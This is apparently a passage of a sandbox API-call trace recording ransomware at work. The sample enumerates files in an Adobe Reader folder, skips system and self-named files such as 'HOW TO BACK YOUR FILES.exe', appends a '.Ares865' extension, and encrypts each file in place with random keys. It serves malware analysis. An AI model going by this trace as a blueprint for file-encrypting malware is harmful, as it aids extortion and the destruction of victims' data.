hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.256] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="aoldtz.exe") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2=".") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="..") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="windows") returned -1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="bootmgr") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="temp") returned -1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="pagefile.sys") returned -1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="boot") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="ids.txt") returned 1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="ntuser.dat") returned -1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="perflogs") returned -1 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2="MSBuild") returned -1 [0154.256] lstrlenW (lpString="LeiaMe.htm") returned 10 [0154.256] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm") returned 52 [0154.256] lstrcpyW (in: lpString1=0x2cce452, lpString2="LeiaMe.htm" | out: lpString1="LeiaMe.htm") returned="LeiaMe.htm" [0154.256] lstrlenW (lpString="LeiaMe.htm") returned 10 [0154.256] lstrlenW (lpString="Ares865") returned 7 [0154.256] lstrcmpiW (lpString1="aMe.htm", lpString2="Ares865") returned -1 [0154.256] lstrlenW (lpString=".dll") returned 4 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2=".dll") returned 1 [0154.256] lstrlenW (lpString=".lnk") returned 4 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2=".lnk") returned 1 [0154.256] lstrlenW (lpString=".ini") returned 4 [0154.256] lstrcmpiW (lpString1="LeiaMe.htm", lpString2=".ini") returned 1 [0154.256] lstrlenW (lpString=".sys") returned 4 [0154.257] lstrcmpiW (lpString1="LeiaMe.htm", lpString2=".sys") returned 1 [0154.257] lstrlenW (lpString="LeiaMe.htm") returned 10 [0154.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.Ares865") returned 59 [0154.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.ares865"), dwFlags=0x1) returned 1 [0154.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.259] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17011) returned 1 [0154.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.260] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.260] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4580, lpName=0x0) returned 0x170 [0154.262] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4580) returned 0x190000 [0154.263] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.264] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.264] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.265] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.265] CloseHandle (hObject=0x170) returned 1 [0154.265] CloseHandle (hObject=0x118) returned 1 [0154.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.265] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="aoldtz.exe") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2=".") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="..") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="windows") returned -1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="bootmgr") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="temp") returned -1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="pagefile.sys") returned -1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="boot") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="ids.txt") returned 1 [0154.265] lstrcmpiW (lpString1="Liesmich.htm", lpString2="ntuser.dat") returned -1 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2="perflogs") returned -1 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2="MSBuild") returned -1 [0154.266] lstrlenW (lpString="Liesmich.htm") returned 12 [0154.266] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm") returned 51 [0154.266] lstrcpyW (in: lpString1=0x2cce452, lpString2="Liesmich.htm" | out: lpString1="Liesmich.htm") returned="Liesmich.htm" [0154.266] lstrlenW (lpString="Liesmich.htm") returned 12 [0154.266] lstrlenW (lpString="Ares865") returned 7 [0154.266] lstrcmpiW (lpString1="ich.htm", lpString2="Ares865") returned 1 [0154.266] lstrlenW (lpString=".dll") returned 4 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2=".dll") returned 1 [0154.266] lstrlenW (lpString=".lnk") returned 4 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2=".lnk") returned 1 [0154.266] lstrlenW (lpString=".ini") returned 4 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2=".ini") returned 1 [0154.266] lstrlenW (lpString=".sys") returned 4 [0154.266] lstrcmpiW (lpString1="Liesmich.htm", lpString2=".sys") returned 1 [0154.266] lstrlenW (lpString="Liesmich.htm") returned 12 [0154.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.Ares865") returned 61 [0154.266] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.ares865"), dwFlags=0x1) returned 1 [0154.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.269] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17078) returned 1 [0154.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.269] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.270] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.270] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.270] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x45c0, lpName=0x0) returned 0x170 [0154.272] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45c0) returned 0x190000 [0154.273] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.274] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.275] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.275] CloseHandle (hObject=0x170) returned 1 [0154.275] CloseHandle (hObject=0x118) returned 1 [0154.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.275] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="aoldtz.exe") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2=".") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="..") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="windows") returned -1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="bootmgr") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="temp") returned -1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="pagefile.sys") returned -1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="boot") returned 1 [0154.275] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="ids.txt") returned 1 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="ntuser.dat") returned -1 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="perflogs") returned -1 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2="MSBuild") returned -1 [0154.276] lstrlenW (lpString="Lisezmoi.htm") returned 12 [0154.276] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm") returned 53 [0154.276] lstrcpyW (in: lpString1=0x2cce452, lpString2="Lisezmoi.htm" | out: lpString1="Lisezmoi.htm") returned="Lisezmoi.htm" [0154.276] lstrlenW (lpString="Lisezmoi.htm") returned 12 [0154.276] lstrlenW (lpString="Ares865") returned 7 [0154.276] lstrcmpiW (lpString1="moi.htm", lpString2="Ares865") returned 1 [0154.276] lstrlenW (lpString=".dll") returned 4 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2=".dll") returned 1 [0154.276] lstrlenW (lpString=".lnk") returned 4 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2=".lnk") returned 1 [0154.276] lstrlenW (lpString=".ini") returned 4 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2=".ini") returned 1 [0154.276] lstrlenW (lpString=".sys") returned 4 [0154.276] lstrcmpiW (lpString1="Lisezmoi.htm", lpString2=".sys") returned 1 [0154.276] lstrlenW (lpString="Lisezmoi.htm") returned 12 [0154.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.Ares865") returned 61 [0154.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.ares865"), dwFlags=0x1) returned 1 [0154.279] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.279] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17351) returned 1 [0154.279] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.279] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.279] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.280] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x46d0, lpName=0x0) returned 0x170 [0154.284] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x46d0) returned 0x190000 [0154.286] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.287] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.287] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.287] CloseHandle (hObject=0x170) returned 1 [0154.287] CloseHandle (hObject=0x118) returned 1 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.287] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.288] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="aoldtz.exe") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2=".") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="..") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="windows") returned -1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="bootmgr") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="temp") returned -1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="pagefile.sys") returned -1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="boot") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="ids.txt") returned 1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="ntuser.dat") returned -1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="perflogs") returned -1 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2="MSBuild") returned -1 [0154.288] lstrlenW (lpString="Llegiu-me.htm") returned 13 [0154.288] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm") returned 53 [0154.288] lstrcpyW (in: lpString1=0x2cce452, lpString2="Llegiu-me.htm" | out: lpString1="Llegiu-me.htm") returned="Llegiu-me.htm" [0154.288] lstrlenW (lpString="Llegiu-me.htm") returned 13 [0154.288] lstrlenW (lpString="Ares865") returned 7 [0154.288] lstrcmpiW (lpString1="-me.htm", lpString2="Ares865") returned 1 [0154.288] lstrlenW (lpString=".dll") returned 4 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2=".dll") returned 1 [0154.288] lstrlenW (lpString=".lnk") returned 4 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2=".lnk") returned 1 [0154.288] lstrlenW (lpString=".ini") returned 4 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2=".ini") returned 1 [0154.288] lstrlenW (lpString=".sys") returned 4 [0154.288] lstrcmpiW (lpString1="Llegiu-me.htm", lpString2=".sys") returned 1 [0154.288] lstrlenW (lpString="Llegiu-me.htm") returned 13 [0154.289] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.Ares865") returned 62 [0154.289] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm.ares865"), dwFlags=0x1) returned 1 [0154.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16892) returned 1 [0154.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.292] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.293] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.293] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.293] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4500, lpName=0x0) returned 0x170 [0154.295] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4500) returned 0x190000 [0154.296] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.297] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.297] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.297] HeapFree (in: 